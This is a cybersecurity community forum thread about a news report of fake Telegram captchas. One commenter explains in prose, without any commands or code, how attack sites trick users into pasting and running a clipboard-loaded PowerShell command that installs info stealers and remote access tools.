Cybersecurity

7688 readers

119 users here now

c/cybersecurity is a community centered on the cybersecurity and information security profession. You can come here to discuss news, post something interesting, or just chat with others.

THE RULES

Instance Rules

Be respectful. Everyone should feel welcome here.
No bigotry - including racism, sexism, ableism, homophobia, transphobia, or xenophobia.
No Ads / Spamming.
No pornography.

Community Rules

Idk, keep it semi-professional?
Nothing illegal. We're all ethical here.
Rules will be added/redefined as necessary.

If you ask someone to hack your "friends" socials you're just going to get banned so don't do that.

Learn about hacking

Hack the Box

Try Hack Me

Pico Capture the flag

Other security-related communities [email protected] [email protected] [email protected] [email protected] [email protected]

Notable mention to [email protected]

founded 2 years ago

MODERATORS

[email protected]

Telegram captcha tricks you into running malicious PowerShell scripts (www.bleepingcomputer.com)

submitted 5 months ago* (last edited 5 months ago) by [email protected] to c/[email protected]

3 comments fedilink hide all child comments

Threat actors on X are exploiting the news around Ross Ulbricht to direct unsuspecting users to a Telegram channel that tricks them into run PowerShell code that infects them with malware.

you are viewing a single comment's thread
view the rest of the comments

[–] [email protected] 6 points 5 months ago

We've been seeing these types attacks for a couple of months, mostly not from telegram links. The way they work is pretty ingenious, in that is leverages the fact that everyone has gotten used to the various "do this thing to prove you're human". In this case the attack works like:

User is directed to a link controlled by the attacker. The link will claim to be something the user wants.
- In my experience, this has been movie or software downloads.
This site presents a page which basically says "prove you are human to get the thing".
In the background, the attack site uses javascript to pre-load the user's clipboard with a malicious PowerShell command.
The site's instructions to "prove you are human" looks like:
1. Press the key combination Win+R
2. Press the key combination Ctrl+V
3. Press Enter
The user being trained to "prove they are human" follows these instructions, resulting in a PowerShell command being run which downloads the malicious payload and executes it.

The payloads we've seen have been info stealers (RedLine, Lumma Stealer, etc.). They also drop some type of Remote Access Tool (e.g. AnyDesk) which the attacker could come back to later, move laterally and try to deploy ransomware.